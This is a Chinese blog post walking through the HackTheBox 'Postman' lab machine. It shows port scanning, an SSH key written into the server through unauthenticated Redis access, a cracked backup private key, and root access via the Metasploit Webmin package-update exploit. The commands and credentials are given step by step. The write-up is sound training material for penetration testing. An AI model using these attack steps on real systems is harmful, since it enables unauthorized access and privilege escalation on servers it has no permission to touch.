HTB-postman

最新推荐文章于 2023-04-14 17:27:48 发布
最新推荐文章于 2023-04-14 17:27:48 发布
阅读量386 收藏
点赞数
分类专栏: HTB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hee_mee/article/details/104418972
版权

端口扫描

nmap -sC -sV -oA path postman.htb

22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Login to Webmin
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

发现19.1版本的webmin,但是多次测试之后发现无法似乎未开启密码重置功能。
上网看了一圈 发现nmap未扫到的redis端口

PORT     STATE SERVICE    VERSION                                
6379/tcp open  tcpwrapped

redis 未授权访问

生成ssh公钥,写入redis

生成ssh公钥
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
写入redis
cat /root/.ssh/key.txt | redis-cli -h 10.10.10.160 -x set xxx

连接redis,导入公钥

连接redis
redis-cli -h 10.10.10.160
导入公钥
config set dir /var/lib/redis/.ssh/
config set dbfilename "authorized_keys"
save

ssh连接redis

ssh -i /root/.ssh/id_rsa redis@10.10.10.160

查看一下user.txt位置

redis@Postman:/opt$ locate user.txt                   
/home/Matt/user.txt  
redis@Postman:/opt$ ls -la /home/Matt/user.txt    
-rw-rw---- 1 Matt Matt 33 Aug 26 03:07 /home/Matt/user.txt

获得Matt私钥

发现需要获得Matt密码,通过nmap扫描结果可以知道靶机开启了ssh,所以找找Matt的ssh私钥

redis@Postman:/opt$ locate id_rsa*                         
/opt/id_rsa.bak  
redis@Postman:/opt$ ls -la /opt/id_rsa.bak           
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 /opt/id_rsa.bak

密码爆破

使用john在攻击机上进行密码爆破

python3 /usr/share/john/ssh2john.py Matt_pass.txt > pass
john --wordlist=/usr/share/wordlists/rockyou.txt pass

获得Matt用户密码:computer2008

切换用户,获取flag

redis@Postman:/opt$ su Matt               
Password:                                           
Matt@Postman:~$ wc -c user.txt              
33 user.txt

获取root权限

发现webmin为19.1版本,使用msf中的模块获取root

msf5 > search webmin
msf5 exploit(linux/http/webmin_backdoor) > use exploit/linux/http/webmin_packageup_rce 
msf5 exploit(linux/http/webmin_packageup_rce) > setg username Matt      
username => Matt 
msf5 exploit(linux/http/webmin_packageup_rce) > setg password computer2008 
password => computer2008  
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 10.10.10.160 
rhosts => 10.10.10.160

值得注意的是需要设置 ssl 为 true
否则无法建立连接

msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true 
ssl => true

获得flag

wc -c /root/root.txt
33 /root/root.txt
hee_mee
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTB靶机-Postman Write Up
weixin_43815032的博客
12-27 1065
0x00 引子 某日在安全客上刷到了这个文章《我是如何拿到OSCP认证的?》,读完之后感觉太TM励志了,教练我也考OSCP,说干就干,于是随手搜索了一些备战OSCP的分享,看了一些准备知识,先从靶场练起。 0x01 准备工作 ...
HTB-Postman
weixin_45434043的博客
03-20 1905
目录HTB - Postman[1]侦察和枚举[1.1]开放的端口[1.2]Web发现[1.3]Redis[1.4]Webmin[2]获得访问权限[2.1]创建公钥[2.2]发布密钥[2.3]获取Redis命令行-将密钥插入到内存之中[2.4]使用SSH登录获得访问权限[3]本地侦察和枚举[4]特权提升[4.1]用户透视[4.2]升级为root HTB - Postman [1]侦察和枚举 [1...
oscp——HTB——Postman
王嘟嘟的博客
04-13 1508
0x00 前言 这个是第一个做的hackthebox的机子,由于这个做出来的人数比较多,所以选择了这个,不知道难度怎么样,决定做一做。 0x01 实验 1.信息收集(端口) 这里由于不掌技巧,所以扫描花费了很久。。。。 这里可以看到开放了,22,80,6379,10000 所以指定扫描一下 2.攻击尝试 2.1 端口攻击尝试 这里肯定是要先考虑一下redis,毕竟有一个未授权访问 然后redi...
postman使用教程
weixin_30951231的博客
08-09 562
接口在联调阶段需要一些方便快捷的工具来检验我们的接口开发效果,目前接口请求工具也是五花八门,有浏览器插件型的,如firefox上的poster插件,chrome上的postman插件,有工具界面型的,如jmeter等等。如何选择一款接口请求工具?其实选择工具就如果我们出去吃饭一样,哪家人多去哪家,准差不离,于是postman就成为了摆在我们面前的那道菜,我将为大家...
从安装Redis练习常规姿势 到HTB实战 postman userflag
weixin_46128614的博客
01-13 589
实验环境 centOS:192.168.49.16 Kali:192.168.49.129 安装 安装过程参考https://blog.csdn.net/buyueliuying/article/details/82316517 centOS7: wget http://download.redis.io/releases/redis-4.0.11.tar.gz tar -xavf redis-4...
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The Box(HTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
my-htb-tools3
03-19
my-htb-tools3
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
RedisGitPostman安装包
07-04
包含了Redis安装包、Git安装包、Postman安装包,开发工具共享
Postman(HackTheBox)
test1988x的博客
01-10 810
本文参考:https://mp.weixin.qq.com/s/oMaEx6JDFC7hW5KfhVEGpw 只为记录 redis未授权 ssh-keygen -t rsa -C "redis@fuck" cd .ssh/ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > ssh.txt redis-cli -h 10.10.10.160 ...
Postman(Redis未授权访问漏洞)
weixin_45007073的博客
11-30 3965
Postman信息收集漏洞利用提权root 信息收集 发现目标开放了22、80、6379等常见端口 root????kali)-[~/Desktop/Scan-Scripts] └─# ./nmap.sh 10.10.10.160 Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-30 07:32 EST Nmap scan report for 10.10.10.160 Host is up (0.30s latency). PORT STA
postman使用方法(新手超级适用,简单明了易懂)
forieda的博客
08-30 9785
文章来源:http://www.cnplugins.com/tool/specify-postman-methods.html  转载自:http://www.cnblogs.com/Skyyj/p/6856728.html   一 简介 Postman 是一款功能超级强大的用于发送 HTTP 请求的 Chrome插件 。做web页面开发和测试的人员应该是无人不晓无人不用!其主要
postman测试接口使用redis报错Unable to connect to Redis; nested exception is org
guoyanan_的博客
08-29 5886
有些小问题明明很简单,但是由于之前没有碰到过,出了问题也只好网上查询,其实别人说的方式已经都是对的,但是自己尝试了之后还是没有解决问题,怎么说呢,事无巨细,把核心问题给说了,但是有的是需要搭建环境的,可能大佬们看来这已经无需再提,但是也是有一些没经历过的同学们难免不能全部考虑到,下面就把这个我碰到的问题经过和处理心得给大家说一下,本来五分钟解决的问题,因为没考虑周全,尝试了半天才知道原来败给了一个小小的基本点。二、找到redis的配置文件(我用的是windows系统)找到redis的安装目录,就是如下图。.
使用Postman并发测试接口&关于RedisTemplate线程安全的一些理解
weixin_42032770的博客
08-30 5121
postman并发测试接口,以及redisTemplate线程安全的理解
HTB-Jeeves
TA不懒,但还没有添加简介
04-14 500
HTB-Jeeves
No.5-Jeeves-难度普通-HTB-walkthrough
weixin_43851945的博客
02-10 512
No.5-Jeeves-难度普通-HTB-walkthrough 攻击机:官方Kali linux 2019 64位 作者:Ikonw 靶机介绍 一,端口扫描 日常的 HTTP端口80 和 端口50000 Jetty HTTP服务器 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-03 15:11 +08 Nmap scan report f...
模拟商品查询并分页功能mysql+redis+postman+jmeter传参测试以及性能测试(对比mysql和redis读取速率)(附代码)
鹜骜的博客
11-21 1182
一:demo 1.创建springboot项目 pom.xml中配置 <dependency> <!--改版本 使得driverclass不报红--> <groupId>mysql</groupId> <artifactId>mysql-connector-java&...
format htb
最新发布
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值